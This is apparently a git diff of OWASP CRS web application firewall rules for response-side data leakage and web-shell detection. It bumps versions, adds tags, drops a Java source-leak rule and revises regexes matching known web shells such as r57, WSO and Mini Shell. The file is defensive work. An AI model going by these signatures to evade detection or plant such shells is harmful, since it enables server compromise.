diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
index 90ebe7816..5d7da92cb 100644
--- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -19,38 +19,16 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 
-#
-# -=[ Java Source Code Leakages ]=-
-#
-SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \
-    "id:952100,\
-    phase:4,\
-    block,\
-    capture,\
-    t:none,\
-    msg:'Java Source Code Leakage',\
-    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\
-    tag:'application-multi',\
-    tag:'language-java',\
-    tag:'platform-multi',\
-    tag:'attack-disclosure',\
-    tag:'paranoia-level/1',\
-    tag:'OWASP_CRS',\
-    tag:'capec/1000/118/116',\
-    tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
-    severity:'ERROR',\
-    setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
-
 #
 # -=[ Java Errors ]=-
 #
@@ -70,32 +48,33 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
index 05f4dcb55..54cdeefa9 100644
--- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -19,11 +19,12 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -45,9 +46,10 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -70,9 +72,10 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -96,15 +99,16 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -129,23 +133,24 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
index 1d37f4514..924fbb823 100644
--- a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+++ b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -19,22 +19,23 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 
 # IIS default location
-SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \
+SecRule RESPONSE_BODY "@rx (?i)[a-z]:[\x5c/]inetpub\b" \
     "id:954100,\
     phase:4,\
     block,\
     capture,\
-    t:none,t:lowercase,\
+    t:none,\
     msg:'Disclosure of IIS install location',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\
     tag:'application-multi',\
@@ -44,8 +45,9 @@ SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\
     tag:'capec/1000/118/116',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -64,9 +66,10 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:</font>
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -88,9 +91,10 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -110,9 +114,10 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     chain"
     SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \
@@ -122,24 +127,24 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-955-WEB-SHELLS.conf b/rules/RESPONSE-955-WEB-SHELLS.conf
index 506994b37..ad46ff027 100644
--- a/rules/RESPONSE-955-WEB-SHELLS.conf
+++ b/rules/RESPONSE-955-WEB-SHELLS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -19,11 +19,12 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-955-WEB-SHELLS"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-955-WEB-SHELLS"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -36,20 +37,21 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \
     block,\
     capture,\
     t:none,\
-    msg:'Web shell detected',\
+    msg:'PHP Web shell detected',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\
     tag:'language-php',\
     tag:'platform-multi',\
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 # r57 web shell
-SecRule RESPONSE_BODY "@rx (<title>r57 Shell Version [0-9.]+</title>|<title>r57 shell</title>)" \
+SecRule RESPONSE_BODY "@rx <title>r57 Shell Version [0-9.]+</title>|<title>r57 shell</title>" \
     "id:955110,\
     phase:4,\
     block,\
@@ -62,13 +64,14 @@ SecRule RESPONSE_BODY "@rx (<title>r57 Shell Version [0-9.]+</title>|<title>r57
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 # WSO web shell
-SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>.*? - WSO [0-9.]+</title>" \
+SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content='text/html; charset=(?:Windows-1251|UTF-8)?'><title>.*?(?: -)? W[Ss][Oo] [0-9.]+</title>" \
     "id:955120,\
     phase:4,\
     block,\
@@ -81,8 +84,9 @@ SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content=
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -100,8 +104,9 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL</title>.*<meta name='author' content='k4
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -119,8 +124,9 @@ SecRule RESPONSE_BODY "@rx <title>Mini Shell</title>.*Developed By LameHacker" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -138,8 +144,9 @@ SecRule RESPONSE_BODY "@rx <title>\.:: .* ~ Ashiyane V [0-9.]+ ::\.</title>" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -157,8 +164,9 @@ SecRule RESPONSE_BODY "@rx <title>Symlink_Sa [0-9.]+</title>" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -176,8 +184,9 @@ SecRule RESPONSE_BODY "@rx <title>CasuS [0-9.]+ by MafiABoY</title>" \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -195,8 +204,9 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<title>GRP WebShell [0-9.]+ " \
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/WEB-SHELLS',\
     tag:'capec/1000/225/122/17/650',\
